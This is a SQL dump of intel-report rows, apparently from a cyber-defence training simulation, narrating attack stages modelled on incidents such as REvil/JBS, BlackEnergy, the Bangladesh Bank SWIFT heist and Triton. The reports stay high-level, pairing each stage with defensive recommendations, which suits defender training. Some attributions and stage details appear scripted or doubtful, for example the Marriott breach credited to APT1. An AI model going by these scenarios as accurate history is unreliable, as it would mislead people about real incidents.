(318, 61, 775, 2, 'Ransomware Deployment and System Impact', '# Ransomware Deployment and System Impact\n\n## Overview\nFollowing the successful phishing attack, REvil deployed ransomware across JBS Foods\' network. This report details the deployment strategy and its immediate impact on operations.\n\n## Deployment Strategy\n- **Malware Delivery:** Utilizing the harvested credentials, attackers executed the ransomware payload on compromised systems.\n- **Immediate Effects:** Critical systems were encrypted, causing significant disruption to JBS Foods\' supply chain and operations.\n\n## System Impact\n- **Operational Disruption:** Production and distribution were severely impacted, with losses estimated in millions.\n- **Response Measures:** Immediate incident response involved isolating affected systems and initiating backup restoration protocols.\n\nUnderstanding this stage is essential for anticipating the mechanisms attackers may use to establish persistence within the network.', '2026-01-11 23:35:35'),
(319, 61, 776, 3, 'Persistence Mechanisms and Threat Intelligence', '# Persistence Mechanisms and Threat Intelligence\n\n## Overview\nAfter deploying ransomware, attackers focused on establishing persistence within JBS Foods\' network to maintain control and facilitate further operations.\n\n## Persistence Tactics\n- **Backdoor Installation:** Attackers installed backdoors on key systems, enabling remote access even after initial detection.\n- **Credential Dumping:** Tools were used to extract additional credentials, allowing deeper penetration into the network.\n\n## Threat Intelligence\n- **Indicators of Compromise (IOCs):** Monitoring for known IOCs is vital for detecting ongoing attacker activity.\n- **Advanced Threat Detection:** Utilizing behavioral analytics to identify unusual network traffic patterns indicative of lateral movement.\n\nThis report highlights the importance of understanding persistence tactics to counteract the lateral movement toward critical systems.', '2026-01-11 23:35:35');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(320, 61, 777, 4, 'Lateral Movement and Financial Transaction Analysis', '# Lateral Movement and Financial Transaction Analysis\n\n## Overview\nThe attackers\' lateral movement within JBS Foods\' network aimed to access critical systems and data essential for demanding ransom. This phase sets the stage for financial transaction analysis related to ransom payment.\n\n## Lateral Movement Techniques\n- **Network Propagation:** Attackers used compromised credentials to move laterally, accessing and encrypting additional systems.\n- **Privilege Escalation:** Escalating privileges allowed comprehensive access to sensitive infrastructure.\n\n## Financial Transaction Analysis\n- **Ransom Demand:** A significant ransom was demanded in Bitcoin, with attackers providing a deadline for payment.\n- **Fund Tracing:** The FBI and cybersecurity teams initiated tracking of Bitcoin transactions to identify recipient wallets and potential recovery opportunities.\n\nUnderstanding this stage is crucial for tracing the ransom payment and analyzing the effectiveness of FBI\'s fund recovery efforts.', '2026-01-11 23:35:35'),
(321, 61, 778, 5, NULL, NULL, '2026-01-11 23:35:35'),
(322, 62, 779, 1, 'Unveiling the Entry Point: Phishing Tactics Analysis', '### Contextual Overview\nFollowing the reported phishing attack, analysis of the phishing emails reveals the use of sophisticated social engineering tactics. The emails were crafted to appear as legitimate communications from known suppliers and partners of the Ukrainian power companies.\n\n### Technical Insight\nUpon inspection, the attachments contained malicious macros that, when executed, dropped the BlackEnergy malware into the network, initiating the breach.\n\n### Recommendations\n- **Training**: Enhance employee training on identifying phishing attempts.\n- **Filtering**: Strengthen email filtering mechanisms to detect and quarantine suspicious emails.\n\n### Next Steps\nFocus shifts to analyzing the execution phase of BlackEnergy malware, understanding its delivery and initial actions within the compromised environment.', '2026-01-11 23:37:37'),
(323, 62, 780, 2, 'Dissecting BlackEnergy: Malware Execution Analysis', '### Contextual Overview\nThe execution of BlackEnergy malware marks a critical escalation in the attack timeline. The malware was activated through malicious macros embedded in the phishing email attachments.\n\n### Technical Insight\nBlackEnergy, once executed, established a foothold by creating a command and control (C2) channel to external servers, enabling remote attackers to deploy additional payloads and instructions.\n\n### Indicators of Compromise\n- Outbound connections to known C2 IP addresses.\n- Presence of BlackEnergy-specific registry entries and files within the system.\n\n### Next Steps\nInvestigate the methods used for credential dumping that allowed the attackers to maintain persistence in the network.', '2026-01-11 23:37:37'),
(324, 62, 781, 3, 'Credential Dumping: Persistence Mechanisms in Play', '### Contextual Overview\nFollowing the execution of BlackEnergy, attackers moved swiftly to dump credentials, a critical step in maintaining persistence within the network.\n\n### Technical Insight\nTools such as Mimikatz were likely leveraged to extract credential information from memory and the local security authority subsystem service (LSASS). This enabled attackers to reuse credentials for further network infiltration.\n\n### Defensive Measures\n- **Monitoring**: Implement continuous monitoring for unusual authentication activities.\n- **Patch Management**: Ensure systems are updated to mitigate known vulnerabilities exploited by credential dumping tools.\n\n### Next Steps\nTransition to analyzing lateral movement techniques employed to infiltrate SCADA systems.', '2026-01-11 23:37:37'),
(325, 62, 782, 4, 'Lateral Movement: Targeting SCADA Systems', '### Contextual Overview\nWith valid credentials, attackers executed lateral movement strategies to access critical SCADA systems, key components in the power grid infrastructure.\n\n### Technical Insight\nAttackers mapped the network using tools like PsExec and leveraged remote desktop services to gain access to SCADA systems. This movement was facilitated by stolen credentials and undetected due to legitimate-looking access patterns.\n\n### Mitigation Strategies\n- **Network Segmentation**: Implement strict network segmentation to isolate critical infrastructure components.\n- **Access Controls**: Enforce the principle of least privilege and implement robust access controls.\n\n### Next Steps\nPrepare for potential destructive actions, including the deployment of the KillDisk wiper, to understand its impact and recovery strategies.', '2026-01-11 23:37:37'),
(326, 62, 783, 5, NULL, NULL, '2026-01-11 23:37:37'),
(327, 63, 784, 1, 'Analysis of Phishing Campaign Tactics', '### Overview\nFollowing the detection of the phishing campaign attributed to Deep Panda, further analysis reveals advanced social engineering tactics targeting Anthem employees. The campaign utilized convincingly crafted emails impersonating internal IT support.\n\n### Key Details\n- **Emails Origin**: The emails were traced back to a known malicious IP address associated with previous Deep Panda activities.\n- **Payload Delivery**: Once the link in the phishing email was clicked, it redirected users to a fake login page capturing credentials.\n\n### Next Steps\nUnderstanding the delivery mechanism provides context for the subsequent event: the suspicious execution of \'Derusbi\' malware, which leveraged compromised credentials for initial access.', '2026-01-11 23:42:29'),
(328, 63, 785, 2, 'Derusbi Malware Execution Insights', '### Overview\nPost-phishing campaign, the compromised credentials facilitated the execution of \'Derusbi\' malware, a sophisticated tool used by Deep Panda for data theft and espionage.\n\n### Key Details\n- **Malware Functionality**: \'Derusbi\' is known for its ability to hide its presence and adapt to infected environments.\n- **Command and Control (C2)**: Communication established with external servers to receive further instructions.\n\n### Next Steps\nThe focus shifts to identifying the persistence mechanisms implemented by the malware, providing insight into their strategy to maintain long-term access to Anthem’s systems.', '2026-01-11 23:42:29'),
(329, 63, 786, 3, 'Persistence Mechanisms Employed by Deep Panda', '### Overview\nDeep Panda employs sophisticated persistence methods to ensure prolonged access to compromised systems.\n\n### Key Details\n- **Registry Modifications**: Alterations in system registry to rerun malicious processes upon startup.\n- **Service Creation**: New services created to maintain the malware\'s presence covertly.\n\n### Next Steps\nAnalyzing persistence provides a foundation for tracing lateral movement within Anthem’s network, indicating how Deep Panda expanded their footprint internally.', '2026-01-11 23:42:29'),
(330, 63, 787, 4, 'Tracing Lateral Movement: Deep Panda\'s Internal Reconnaissance', '### Overview\nDeep Panda\'s strategy involves extensive lateral movement to gather intelligence and identify valuable data within Anthem’s infrastructure.\n\n### Key Details\n- **Credential Dumping**: Use of tools to harvest additional credentials, escalating privileges.\n- **Network Mapping**: Identification of key servers and databases holding sensitive information.\n\n### Next Steps\nMonitoring these activities leads directly to detecting data exfiltration attempts, marking the final stage of the breach.', '2026-01-11 23:42:29'),
(331, 63, 788, 5, NULL, NULL, '2026-01-11 23:42:29'),
(332, 64, 789, 1, 'Analysis of Initial Access via Spear Phishing Campaign', '## Context After Alert 1: Initial Access via Spear Phishing\n\n### Overview\nAfter the successful spear phishing campaign that granted initial access, it appears that the adversaries behind the OPM breach have strategically tailored their phishing emails to exploit vulnerabilities within the federal network\'s email systems. The utilization of deceptive email headers and sophisticated social engineering tactics suggests a high level of reconnaissance.\n\n### Insights\n- **Targeted Individuals:** The phishing emails were directed towards personnel with administrative privileges and access to HR databases, highlighting the adversaries\' objective to penetrate systems that hold sensitive personnel data.\n- **Phishing Techniques:** Analysis of the phishing emails revealed an advanced use of domain spoofing and malicious attachments disguised as internal documents.\n\n### Implications for Next Steps\nThe successful initial access suggests a potential for deeper network infiltration. The next phase may involve malware execution to establish persistent control over the network, likely using a Remote Access Tool (RAT) such as PlugX.\n', '2026-01-11 23:44:22'),
(333, 64, 790, 2, 'Deployment and Execution of PlugX RAT', '## Context After Alert 2: Execution of PlugX RAT for Network Control\n\n### Overview\nFollowing the initial compromise, the adversaries deployed the PlugX RAT to maintain persistent access and control over the compromised network. PlugX, known for its stealth and versatility, allows attackers to execute commands, manage files, and exfiltrate data without detection.\n\n### Technical Details\n- **Installation Vectors:** The RAT was introduced through a disguised executable masquerading as a legitimate government application.\n- **Capabilities:** PlugX enables remote command execution, file manipulation, and data exfiltration, all while evading traditional security mechanisms.\n\n### Implications for Next Steps\nThe presence of PlugX indicates the adversaries are likely in the process of identifying and extracting sensitive personnel data. Attention must be directed towards monitoring network traffic for unusual patterns and securing data repositories to prevent exfiltration.\n', '2026-01-11 23:44:22'),
(334, 64, 791, 3, NULL, NULL, '2026-01-11 23:44:22'),
(335, 65, 792, 1, 'APT1\'s Spear Phishing Campaign: Entry Point Analysis', '### Overview\nFollowing the spear phishing campaign targeting Marriott employees, initial access was successfully established. This targeted approach focused on social engineering tactics, exploiting human vulnerabilities.\n\n### Key Findings\n- **Phishing Techniques**: The campaign utilized highly personalized emails, often mimicking internal communications.\n- **Malicious Attachments**: Attachments were disguised as routine documents but contained malicious macros.\n- **Compromised Accounts**: Several user accounts were compromised, providing the attackers with initial footholds.\n\n### Next Steps\nThe next phase likely involves the deployment of malicious software to establish deeper network infiltration. Monitoring for unusual software execution is recommended.', '2026-01-12 22:14:44'),
(336, 65, 793, 2, 'Remote Access Trojan Deployment: APT1\'s Next Move', '### Overview\nFollowing the initial phishing success, APT1 deployed a sophisticated Remote Access Trojan (RAT) to execute commands and maintain control over compromised systems.\n\n### Key Findings\n- **RAT Characteristics**: The RAT employed is capable of evading detection, utilizing encryption to mask its activities.\n- **Command and Control (C2)**: Communication with external command servers was established, indicating preparation for sustained network presence.\n- **Execution Pathways**: The malware was executed via compromised user credentials, minimizing detection risk.\n\n### Next Steps\nInvestigate persistence mechanisms to understand how APT1 maintains long-term access and control over compromised systems.', '2026-01-12 22:14:44'),
(337, 65, 794, 3, 'Persistence Mechanism: Ensuring APT1\'s Long-Term Access', '### Overview\nAPT1 has implemented sophisticated persistence mechanisms to maintain control over Marriott\'s network, even post-acquisition.\n\n### Key Findings\n- **Registry Modifications**: Alterations in system registries ensure the RAT reinitializes upon system reboot.\n- **Scheduled Tasks**: New tasks have been created to periodically execute the RAT, ensuring continued presence.\n- **Credential Dumping**: Harvested credentials are used to re-establish access if initial footholds are compromised.\n\n### Next Steps\nAPT1\'s strategy will likely involve lateral movement, exploiting network trust to expand their infiltration scope.', '2026-01-12 22:14:44'),
(338, 65, 795, 4, 'Lateral Movement: APT1 Exploits Network Trust', '### Overview\nAPT1 has begun exploiting network trust relationships within Marriott\'s infrastructure to facilitate lateral movement.\n\n### Key Findings\n- **Pass-the-Hash Attacks**: Utilizing stolen credentials to access other systems without needing passwords.\n- **Network Mapping**: Detailed reconnaissance has been performed to identify high-value targets within the network.\n- **Privileged Escalation**: Techniques used to escalate privileges and gain access to sensitive data stores.\n\n### Next Steps\nThe final phase involves data exfiltration, likely utilizing encrypted channels to transfer stolen data without detection.', '2026-01-12 22:14:44'),
(339, 65, 796, 5, NULL, NULL, '2026-01-12 22:14:44'),
(340, 66, 797, 1, NULL, NULL, '2026-01-12 22:16:51'),
(341, 66, 798, 2, 'Execution of X-Agent Implant', '### Summary\nFollowing the detection of the spear-phishing campaign, it has been confirmed that the APT28 group successfully executed the X-Agent implant on compromised systems. \n\n### Details\n- **Implant Functionality**: X-Agent is a modular backdoor capable of keystroke logging, file extraction, and remote access.\n- **Execution Method**: The implant was delivered as a payload within the spear-phishing campaign, likely disguised as a legitimate document.\n\n### Recommendations\n- Verify the integrity of files and monitor for unusual process activity.\n- Implement stricter email filtering and employee training on recognizing phishing attempts.', '2026-01-12 22:16:51'),
(342, 66, 799, 3, 'Establishment of X-Tunnel Backdoor', '### Summary\nPost-execution of the X-Agent implant, APT28 has established a persistent backdoor using X-Tunnel.\n\n### Details\n- **Backdoor Capabilities**: X-Tunnel enables encrypted communications, facilitating data exfiltration and further control over the network.\n- **Persistence Mechanism**: X-Tunnel is configured to start automatically, allowing continued access even after system reboots.\n\n### Recommendations\n- Analyze network traffic for anomalous encrypted connections.\n- Consider network segmentation to limit lateral movement.', '2026-01-12 22:16:51'),
(343, 66, 800, 4, 'Credential Dump for Lateral Movement', '### Summary\nAPT28 is leveraging stolen credentials to move laterally within the network.\n\n### Details\n- **Credential Harvesting**: Credentials were harvested from compromised machines via the X-Agent implant.\n- **Lateral Movement Tactics**: Techniques include Pass-the-Hash and Pass-the-Ticket to access additional systems.\n\n### Recommendations\n- Reset compromised credentials and enforce multi-factor authentication.\n- Regularly audit user access rights and monitor for unauthorized access attempts.', '2026-01-12 22:16:51'),
(344, 66, 801, 5, 'Data Exfiltration to External Servers', '### Summary\nAPT28 has initiated data exfiltration activities, transferring sensitive information to external servers.\n\n### Details\n- **Exfiltration Channels**: Data is being exfiltrated using the X-Tunnel backdoor, employing encrypted communications.\n- **Targeted Data**: Emails, documents, and other sensitive files are the primary targets.\n\n### Recommendations\n- Implement data loss prevention (DLP) solutions to detect and block unauthorized data transfers.\n- Conduct a comprehensive data breach impact assessment and notify affected parties as required.', '2026-01-12 22:16:51'),
(345, 67, 802, 1, 'Analysis of Unusual RDP Logins', '### Contextual Overview\nFollowing the alert of **Unusual RDP Logins Detected**, initial investigations have revealed potential lateral movement attempts by APT33 operatives. The unauthorized logins appear to originate from IP addresses previously associated with APT33 infrastructure. \n\n### Next Steps\nIn response to these logins, analysts should prepare for the possibility of **Payload Execution**. It is crucial to monitor for any signs of script or binary execution that may indicate the deployment of a malicious payload. \n\n### Recommendations\n- Conduct a thorough review of RDP logs for any anomalies.\n- Enhance monitoring of systems for unexpected processes or script executions.', '2026-01-12 22:17:37'),
(346, 67, 803, 2, 'Execution of Malicious Payload', '### Incident Detail\nThe alert for **Execution of Malicious Payload** has been triggered, indicating that APT33 has successfully deployed a harmful software component. The payload is believed to contain components designed for registry modification and service creation. \n\n### Insights\nThis stage is critical as it establishes persistence within the network. Security teams should investigate to determine if any unauthorized registry changes or new services have been created. This will help in identifying the extent of the breach.\n\n### Next Steps\nPrepare for **Registry Modification and Service Creation**. Focus should be on detecting and reversing any unauthorized changes to maintain system integrity.\n\n### Recommendations\n- Utilize registry monitoring tools to detect modifications.\n- Implement alerts for the creation of new services.', '2026-01-12 22:17:37'),
(347, 67, 804, 3, 'Registry Modification and Service Creation Analysis', '### Current Situation\nFollowing the execution of the malicious payload, **Registry Modification and Service Creation** have been detected. These actions are designed to ensure the persistence of the threat actor within the network.\n\n### Deeper Insight\nAPT33 employs these techniques to maintain access across system reboots and disruptions. The modifications align with known tactics of service creation using Windows Management Instrumentation (WMI).\n\n### Next Steps\nPrepare for an increase in **Network Traffic and SMB Activity**, as the adversaries may begin to move laterally through the network. Monitoring network traffic patterns and SMB connections will be crucial.\n\n### Recommendations\n- Deploy network anomaly detection systems.\n- Harden SMB configurations and monitor for unusual activity.', '2026-01-12 22:17:37'),
(348, 67, 805, 4, 'Increased Network Traffic and SMB Activity', '### Overview\nThe alert for **Increased Network Traffic and SMB Activity** signifies that APT33 is actively moving laterally within the network. This stage often precedes destructive actions.\n\n### Analysis\nThe increase in SMB connections may indicate data exfiltration efforts or the planting of additional payloads. This activity aligns with previous APT33 operations where lateral movement was a precursor to destructive attacks.\n\n### Next Steps\nPrepare for the potential **MBR Overwrite Detected**, a hallmark of the Shamoon attack. This destructive phase involves overwriting the Master Boot Record to render systems inoperable.\n\n### Recommendations\n- Isolate affected segments to prevent further lateral movement.\n- Initiate backup and recovery plans in anticipation of potential data destruction.', '2026-01-12 22:17:37'),
(349, 67, 806, 5, NULL, NULL, '2026-01-12 22:17:37'),
(350, 68, 807, 1, 'Analysis of Initial Access Vector', '### Overview\nThe suspicious login attempt detected indicates a potential compromise of credentials or exploitation of a vulnerability in the authentication system.\n\n### Context\n- **Origin IP:** Traced to a known proxy service often used by attackers.\n- **Target:** Administrative account with elevated privileges.\n\n### Next Steps\nPrepare for potential malware execution, as this is a common progression following unauthorized access.\n\n### Recommendations\n- Immediate password reset for affected accounts.\n- Implement multi-factor authentication (MFA) for all sensitive access points.', '2026-01-12 22:20:16'),
(351, 68, 808, 2, 'Malware Execution and Initial Impact', '### Overview\nMalware has been executed on the compromised system, confirming unauthorized access intent.\n\n### Context\n- **Type:** Custom malware linked to Cobalt Group\'s known toolkit.\n- **Functionality:** Initial reconnaissance and data collection.\n\n### Implications\nThe malware may attempt persistence mechanisms; observe for backdoor installation attempts.\n\n### Recommendations\n- Quarantine affected systems.\n- Begin forensic image capture for further analysis.', '2026-01-12 22:20:16'),
(352, 68, 809, 3, 'Backdoor Installation and Persistence Likelihood', '### Overview\nBackdoor installation has been identified, indicating efforts to maintain long-term access.\n\n### Context\n- **Backdoor Type:** Customized variant of a known Cobalt Group tool.\n- **Persistence Mechanism:** Registry key modification and scheduled task creation.\n\n### Implications\nThe backdoor facilitates lateral movement within the network.\n\n### Recommendations\n- Conduct a full network scan for similar backdoor signatures.\n- Strengthen endpoint monitoring and defenses.', '2026-01-12 22:20:16'),
(353, 68, 810, 4, 'Lateral Movement and Target Expansion', '### Overview\nLateral movement detected, suggesting expansion of the attack footprint within the network.\n\n### Context\n- **Techniques Used:** Pass-the-Hash and Remote Desktop Protocol (RDP) exploitation.\n- **New Targets:** Systems within the card processing network.\n\n### Implications\nIncreased risk of ATM software manipulation.\n\n### Recommendations\n- Isolate compromised segments.\n- Monitor for unauthorized access attempts on critical systems.', '2026-01-12 22:20:16'),
(354, 68, 811, 5, 'ATM Software Manipulation Attempt Overview', '### Overview\nAn attempt to manipulate ATM software has been detected, potentially to alter withdrawal limits or log transactions.\n\n### Context\n- **Methodology:** Direct code injection into ATM management software.\n- **Potential Objective:** Enable unauthorized cash dispensing.\n\n### Implications\nImmediate risk of physical cash loss.\n\n### Recommendations\n- Disable affected ATM systems.\n- Conduct a thorough review of software integrity.', '2026-01-12 22:20:16'),
(355, 68, 812, 6, 'Card Processing Network Breach Analysis', '### Overview\nThe breach of the card processing network has been confirmed, with attackers accessing sensitive transaction data.\n\n### Context\n- **Data Compromised:** Cardholder information and transaction logs.\n- **Exfiltration Method:** Data exfiltrated via encrypted channels.\n\n### Implications\nPotential for fraudulent transactions using exfiltrated data.\n\n### Recommendations\n- Notify affected financial institutions.\n- Enhance encryption and access controls on transaction data.', '2026-01-12 22:20:16'),
(356, 68, 813, 7, 'Money Mule Coordination and Execution', '### Overview\nEvidence of money mule coordination suggests the final phase of the heist is operational.\n\n### Context\n- **Communication Channels:** Encrypted messaging applications.\n- **Regions Targeted:** Multiple international locations.\n\n### Implications\nCoordinated cash withdrawal operations are imminent.\n\n### Recommendations\n- Liaise with law enforcement for potential arrests.\n- Monitor ATM networks for suspicious withdrawal patterns.', '2026-01-12 22:20:16'),
(357, 68, 814, 8, NULL, NULL, '2026-01-12 22:20:16'),
(358, 69, 815, 1, 'Analysis of Custom Malware Deployment', '### Overview\nFollowing the initial compromise via spear phishing, the Lazarus Group swiftly moved to deploy custom malware within the Bangladesh Bank network. This report explores the specifics of the malware used, its capabilities, and its role in the broader heist operation.\n\n### Key Findings\n- **Custom Malware Identification**: The malware was tailored to bypass the bank\'s security measures, specifically targeting systems connected to the SWIFT network.\n- **Capabilities**: Enabled covert communication with command and control servers, data exfiltration, and remote system control.\n- **Evasion Techniques**: Utilized obfuscation and polymorphic features to remain undetected by traditional antivirus solutions.\n\n### Implications\nThis stage allowed the attackers to gain a foothold within the network, setting the stage for establishing persistence and further infiltration.', '2026-01-12 22:20:52'),
(359, 69, 816, 2, 'Persistence Mechanisms Established by Lazarus Group', '### Overview\nOnce the custom malware was deployed, the Lazarus Group focused on establishing persistence within the Bangladesh Bank network. This report delves into the techniques used to maintain long-term access.\n\n### Key Findings\n- **Backdoor Creation**: Multiple backdoors were installed, providing redundant access points.\n- **Registry Manipulation**: Modified system registries to ensure malware execution upon system startup.\n- **Credential Harvesting**: Captured administrator credentials to facilitate uninterrupted access.\n\n### Implications\nEstablishing persistence allowed the attackers to operate undetected over an extended period, crucial for planning the heist\'s next phases, including lateral movement.', '2026-01-12 22:20:52'),
(360, 69, 817, 3, 'Lateral Movement to SWIFT Servers', '### Overview\nWith persistence mechanisms in place, the Lazarus Group began moving laterally within the network to reach the SWIFT servers. This report outlines the strategies deployed to achieve this objective.\n\n### Key Findings\n- **Network Scanning**: Conducted thorough scans to map the internal network topology and identify pathways to SWIFT servers.\n- **Use of Stolen Credentials**: Leveraged harvested credentials to access critical systems undetected.\n- **Privilege Escalation**: Exploited vulnerabilities to escalate privileges and gain administrator access to SWIFT servers.\n\n### Implications\nSuccessfully accessing the SWIFT servers was a critical milestone, allowing the group to manipulate financial transactions, setting the stage for the next phase involving message manipulation.', '2026-01-12 22:20:52'),
(361, 69, 818, 4, 'Manipulation of SWIFT Messages', '### Overview\nHaving gained access to the SWIFT servers, the Lazarus Group began manipulating SWIFT messages to initiate fraudulent transactions. This report examines the tactics used to alter and forge SWIFT messages.\n\n### Key Findings\n- **Message Alteration**: Modified existing SWIFT messages to redirect funds to accounts controlled by the group.\n- **Fake Transaction Creation**: Generated new, fraudulent messages mimicking legitimate transactions.\n- **Log Tampering**: Altered system logs to cover tracks and avoid detection by bank operators.\n\n### Implications\nThe manipulation of SWIFT messages was central to executing the heist, allowing the attackers to initiate unauthorized transfers totaling $951 million.', '2026-01-12 22:20:52'),
(362, 69, 819, 5, 'Exfiltration of Stolen Funds', '### Overview\nFollowing the manipulation of SWIFT messages, the Lazarus Group successfully exfiltrated the stolen funds. This report details the methods used to transfer and secure the funds outside the bank\'s control.\n\n### Key Findings\n- **Account Transfers**: Funds were initially transferred to numerous bank accounts across various countries.\n- **Use of Shell Companies**: Employed shell companies to obscure the trail and complicate traceability.\n- **Layered Transactions**: Executed multiple layered transactions to further obfuscate the money trail.\n\n### Implications\nThe successful exfiltration of funds was a critical step in the heist, enabling the group to move substantial sums undetected, paving the way for laundering operations.', '2026-01-12 22:20:52'),
(363, 69, 820, 6, 'Funds Laundered via Philippine Casinos', '### Overview\nThe final phase of the heist involved laundering the stolen funds through Philippine casinos. This report explores the techniques used to clean the money and integrate it into the legitimate financial system.\n\n### Key Findings\n- **Casino Junket Operations**: Funds were funneled through casino junket operators, exploiting regulatory gaps.\n- **High-Value Gambling**: Engaged in high-stakes gambling to convert illicit funds into gambling chips, then cash-out legitimate earnings.\n- **Complex Money Movement**: Utilized a network of agents to transfer and divide funds across multiple accounts and jurisdictions.\n\n### Implications\nLaundering the funds through casinos provided the Lazarus Group with a sophisticated method to legitimize the stolen money, effectively concluding the heist operation.', '2026-01-12 22:20:52'),
(364, 69, 821, 7, NULL, NULL, '2026-01-12 22:20:52'),
(365, 70, 822, 1, 'Analysis of Second-Stage Payload Deployment', '## Overview\nAfter the initial compromise via the CCleaner supply chain attack, the adversaries, identified as APT41, have deployed a sophisticated second-stage payload. This payload is designed to target specific high-value technology firms.\n\n## Technical Details\n- **Payload Characteristics**: The second-stage payload exhibits characteristics consistent with APT41\'s previous operations, including the use of custom backdoors and encrypted command-and-control (C2) communications.\n- **Targeted Firms**: Intelligence suggests that 40 technology firms have been specifically targeted based on their strategic value, with a focus on those involved in software development and cloud services.\n\n## Implications\nThe deployment of this payload indicates a shift from a broad compromise to targeted espionage. The attackers are likely aiming to gather sensitive information, including intellectual property and strategic business data.\n\n## Recommendations\n- **Enhanced Monitoring**: Increase monitoring of network traffic for unusual patterns that could indicate C2 communications or data exfiltration.\n- **Patch Management**: Ensure all systems are up to date with the latest security patches to mitigate vulnerabilities that could be exploited by the payload.', '2026-01-12 22:25:20'),
(366, 70, 823, 2, 'Exfiltration Tactics and Data Breach Analysis', '## Overview\nFollowing the deployment of the second-stage payload, APT41 has initiated the exfiltration of sensitive data from the compromised networks.\n\n## Exfiltration Techniques\n- **Data Transfer Methods**: The attackers are using encrypted channels to transfer sensitive data, minimizing detection. Known methods include the use of HTTPS and VPN to obscure data flow.\n- **Data Types**: Data types targeted for exfiltration include proprietary source code, confidential emails, and internal documents related to product development.\n\n## Impact Assessment\nThe breach poses significant risks, including potential financial losses, reputational damage, and loss of competitive advantage for the affected firms.\n\n## Recommendations\n- **Incident Response**: Activate incident response teams to contain and mitigate the breach.\n- **Data Loss Prevention**: Implement data loss prevention (DLP) solutions to monitor and block unauthorized data transfers.\n- **User Education**: Conduct user training sessions to raise awareness about phishing tactics and other methods used to gain initial access.', '2026-01-12 22:25:20'),
(367, 70, 824, 3, NULL, NULL, '2026-01-12 22:25:20'),
(368, 71, 825, 1, 'Analysis of Phishing Email Initial Access', '## Report: Analysis of Initial Access via Phishing\n\n### Overview\nThe attack began with a targeted phishing email sent to a key employee at the petrochemical plant. The email included a malicious attachment disguised as a critical update from a trusted vendor.\n\n### Technical Details\n- **Email Header Analysis**: The email originated from a spoofed domain similar to the legitimate vendor.\n- **Attachment**: The attachment was a macro-laden document that, once opened, executed a script to download the Triton/TRISIS payload.\n\n### Next Steps\nFollowing the successful phishing attempt, the malware payload is expected to execute on the victim\'s machine. Monitoring for anomalous script execution or unauthorized downloads is recommended to detect this activity.', '2026-01-13 01:52:24'),
(369, 71, 826, 2, 'Execution of Malware Payload: Detailed Insights', '## Report: Execution of Malware Payload\n\n### Overview\nThe malware, once executed, dropped a payload that initiated the attack chain within the plant\'s IT infrastructure.\n\n### Technical Details\n- **Payload Analysis**: The payload was a heavily obfuscated binary designed to evade detection by standard antivirus solutions.\n- **Execution Behavior**: Upon execution, the malware established communication with a command and control (C2) server to receive further instructions.\n\n### Next Steps\nThe next phase involves the malware attempting to establish persistence within the system. Analysts should focus on identifying any backdoor installations or modifications to system startup configurations.', '2026-01-13 01:52:24'),
(370, 71, 827, 3, 'Establishing Persistence: Backdoor Installation Insights', '## Report: Establishing Persistence\n\n### Overview\nThe malware successfully established a foothold in the system by installing a backdoor, ensuring continued access to the compromised network.\n\n### Technical Details\n- **Persistence Mechanism**: The backdoor was installed as a service, configured to start automatically with the system boot.\n- **Registry Modifications**: Key registry entries were altered to maintain persistence across reboots.\n\n### Next Steps\nThe operation will now focus on lateral movement to reach the Safety Instrumented System (SIS) controllers. Network traffic and access logs should be closely monitored for unusual patterns indicative of this propagation.', '2026-01-13 01:52:24'),
(371, 71, 828, 4, 'Lateral Movement: Network Propagation to SIS Controllers', '## Report: Lateral Movement to SIS Controllers\n\n### Overview\nThe attackers initiated lateral movement within the network to target SIS controllers, critical components in maintaining plant safety.\n\n### Technical Details\n- **Network Scanning**: Tools were used to identify and map the network, focusing on systems with access to SIS controllers.\n- **Credential Harvesting**: The attackers captured administrative credentials to facilitate movement across segmented networks.\n\n### Next Steps\nThe operation is expected to progress to data exfiltration, specifically targeting system configurations and sensitive data from SIS controllers. Enhanced monitoring of outbound data flows is crucial to detect and mitigate this phase.', '2026-01-13 01:52:24'),
(372, 71, 829, 5, NULL, NULL, '2026-01-13 01:52:24'),
(373, 72, 830, 1, 'Lateral Movement Analysis Post-Phishing Attack', '### Summary\nFollowing the initial access through spear-phishing, threat actors have initiated lateral movement within the network. This has been achieved through credential dumping techniques, indicating a breach of internal security protocols.\n\n### Key Indicators\n- **Credential Dumping Tools Detected**: Tools such as Mimikatz and ProcDump have been identified, suggesting attempts to harvest credentials from memory.\n- **Compromised Accounts**: Several administrative accounts have shown signs of unauthorized access, potentially increasing the breadth of the attack.\n\n### Recommendations\n- **Immediate Password Resets**: Conduct a forced reset of all potentially compromised accounts.\n- **Enhanced Monitoring**: Increase logging and monitoring on privileged accounts to detect further unauthorized access attempts.\n- **Network Segmentation**: Apply stricter segmentation controls to limit lateral movement capabilities of the threat actors.\n\n### Next Steps\nPrepare for potential data exfiltration attempts by monitoring outbound network traffic and securing sensitive data repositories.', '2026-01-13 01:56:44'),
(374, 72, 831, 2, 'Data Exfiltration and Encryption Alert', '### Summary\nThe attackers have progressed to data exfiltration, indicating an escalation in the attack\'s impact. This phase involves the unauthorized transfer of sensitive data outside the network, coupled with file encryption activities.\n\n### Key Indicators\n- **Unusual Data Transfers**: Significant volumes of data have been detected moving to external IP addresses not commonly associated with regular business operations.\n- **File Encryption Routines**: The presence of encrypted files and ransom notes has been confirmed, typical of Conti ransomware operations.\n\n### Recommendations\n- **Isolate Infected Systems**: Quickly isolate systems identified with encryption activity to prevent further spread.\n- **Data Loss Prevention (DLP) Measures**: Implement DLP technologies to monitor and control outbound data flows.\n- **Engage Law Enforcement**: Notify relevant authorities for assistance and to comply with legal obligations.\n\n### Next Steps\nFocus on incident response and recovery, including system restoration and reinforcement of security measures to prevent recurrence. Prepare communication plans for internal and external stakeholders regarding the breach and its implications.', '2026-01-13 01:56:44'),
(375, 72, 832, 3, NULL, NULL, '2026-01-13 01:56:44'),
(376, 73, 856, 1, 'Web Shell Deployment Detected', '### Overview\nFollowing the initial access achieved through VPN authentication bypass, our systems have detected the deployment of web shells on compromised servers.\n\n### Detailed Findings\n- **Location:** The web shells were deployed on servers linked to defense contractors.\n- **Technique:** The attackers utilized known vulnerabilities in web applications to upload malicious scripts.\n- **Indicator of Compromise (IoC):** Unusual POST requests to `/uploads/aspnet_client/system_web/`.\n\n### Recommended Actions\n- **Containment:** Immediately isolate affected servers to prevent further exploitation.\n- **Mitigation:** Implement application whitelisting to block unauthorized scripts.\n\n### Next Steps\nPrepare for potential persistence mechanisms as Hafnium may attempt to maintain access through these web shells.', '2026-01-15 00:50:02'),
